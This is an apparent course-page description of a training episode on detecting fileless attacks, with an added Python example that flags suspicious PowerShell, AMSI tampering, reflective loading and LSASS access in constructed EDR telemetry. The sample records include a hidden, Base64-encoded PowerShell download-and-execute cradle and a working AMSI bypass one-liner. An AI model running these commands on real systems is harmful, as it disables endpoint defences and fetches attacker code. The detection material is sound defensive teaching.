Episode 8 — The Process That Hid in Memory | Security Operations: EDR Detection & Fileless Attacks
About this title
Security+ Domain 4 concepts • CySA+ behavioral analytics • SOC fileless attack detection
Modern attackers don’t always drop files. Sometimes the entire attack runs in memory: nothing is written to disk, so file-based antivirus scans have nothing to inspect, and the intrusion relies on stealth to stay ahead of the SOC.
In this cinematic scenario, you’ll see how defenders detect fileless techniques through subtle signals: unusual PowerShell behavior, reflective loading, credential access attempts, and processes that should never run the way they’re running.
What you’ll learn:
• How fileless attacks operate without touching disk
• Why memory-only processes are early indicators of compromise
• How EDR/XDR telemetry exposes reflective loading & AMSI bypass attempts
• How attackers attempt credential access through LSASS
• What suspicious PowerShell behavior looks like
• How to isolate, contain, and escalate memory-resident threats
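To make the signals above concrete, here is an added example (not code from the episode or from CyberLex Learning) of the kind of behavioral rules a SOC runs over EDR telemetry: an Office process spawning a shell, an encoded or hidden-window PowerShell command line, AMSI tampering and reflective-loading keywords, a download-and-execute pattern, and a non-allowlisted process opening lsass.exe with read access. The telemetry records are constructed sample data; the field names (Image, ParentImage, CommandLine, SourceImage, TargetImage, GrantedAccess) follow Sysmon-style conventions but are an assumption of the example, as are the allowlist and the keyword lists.

```python
"""Behavioral triage of constructed EDR telemetry for fileless-attack signals.

Added example, not the episode's material. Records are constructed; field names
mirror Sysmon-style process-create (Event ID 1) and process-access (Event ID 10)
records but are an assumption of this example, as are the keyword lists.
"""
import base64
import re

# Processes that legitimately open LSASS; an assumed allowlist for the example.
LSASS_ALLOWED = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
PROCESS_VM_READ = 0x0010  # access-right bit present in masks such as 0x1010 / 0x1410
# Parents that rarely have a legitimate reason to launch a shell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

STEALTH_FLAGS = r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-noni\b|-noninteractive"
AMSI_PATTERNS = [r"amsiutils", r"amsiinitfailed", r"amsi\.dll", r"amsiscanbuffer"]
REFLECTIVE_PATTERNS = [r"reflection\.assembly\]::load", r"invoke-reflectivepeinjection",
                       r"virtualalloc", r"memorystream"]
DOWNLOAD_EXEC = r"downloadstring|\biex\b|invoke-expression"


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE) or None.

    Matches -e, -ec, -enc, -encodedcommand (PowerShell accepts unique prefixes).
    """
    m = re.search(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_process_create(ev):
    """Apply behavioral rules to one process-creation record."""
    findings = []
    image = ev["Image"].lower().rsplit("\\", 1)[-1]
    parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    text = cmd.lower()
    if image in SHELLS and parent in SUSPICIOUS_PARENTS:
        findings.append(f"shell {image} spawned by {parent}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command")
        text += " " + decoded.lower()  # inspect the decoded payload as well
    if re.search(STEALTH_FLAGS, text):
        findings.append("hidden-window / no-profile flags")
    if any(re.search(p, text) for p in AMSI_PATTERNS):
        findings.append("AMSI tampering keywords")
    if any(re.search(p, text) for p in REFLECTIVE_PATTERNS):
        findings.append("in-memory / reflective loading keywords")
    if re.search(DOWNLOAD_EXEC, text):
        findings.append("download-and-execute pattern")
    return findings


def score_process_access(ev):
    """Flag non-allowlisted processes that open lsass.exe with VM_READ access."""
    if not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return []
    source = ev["SourceImage"].lower()
    access = int(ev["GrantedAccess"], 16)
    if source in LSASS_ALLOWED or not access & PROCESS_VM_READ:
        return []
    return [f"{source} opened lsass.exe with access 0x{access:x}"]


def triage(events):
    """Return {RecordId: [findings]} for every record that trips at least one rule."""
    results = {}
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            hits = score_process_create(ev)
        elif ev["EventType"] == "ProcessAccess":
            hits = score_process_access(ev)
        else:
            hits = []
        if hits:
            results[ev["RecordId"]] = hits
    return results


# Constructed sample telemetry (not real data); the IP and paths are placeholders.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"RecordId": 2, "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command \"[Ref].Assembly.GetType('System.Management."
                    "Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')"
                    ".SetValue($null,$true)\""},
    {"RecordId": 3, "EventType": "ProcessAccess",
     "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"RecordId": 4, "EventType": "ProcessCreate",  # benign admin activity, should stay quiet
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"RecordId": 5, "EventType": "ProcessAccess",  # allowlisted system process
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
]

if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS).items():
        print(record_id, hits)
```

Records 1, 2 and 3 trip rules; the plain Get-ChildItem and the csrss.exe access do not. The point of decoding -EncodedCommand before matching is that the download-and-execute cradle in record 1 is invisible in the raw command line; keyword rules like these are a starting point for triage, not a replacement for EDR memory telemetry, since attackers rename and obfuscate the strings they match on.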
Security Operations Skills Covered:
✔ EDR/XDR telemetry interpretation
✔ Memory analysis fundamentals
✔ Fileless malware techniques
✔ Behavioral & heuristic detection
✔ Credential theft monitoring
✔ Threat hunting signals
✔ Incident response workflow for in-memory attacks
This scenario reinforces key concepts from:
Security+ (SY0-701) — EDR/XDR, behavioral detection, malware identification, IR workflows
CySA+ (CS0-003) — Memory-based attacks, credential access attempts, advanced detection analytics
Designed to support both exam learners and working SOC analysts.
Ideal for:
— Security+ learners
— CySA+ learners
— SOC Tier 1 analysts
— Blue team defenders
— Incident responders
— Anyone learning how modern attackers avoid traditional AV
Short. Cinematic. Practical. A real-world look into attacks designed to stay invisible.
New episodes weekly.
Explore the works of M.G. Vance on Amazon — including Security+, CySA+, CISA, CISM, CRISC, and The Breach Nobody Saw Coming titles.
Amazon Author Page: https://www.amazon.com/stores/author/B0FX7TZSV4/
CyberLex Learning — Forge the Defender.
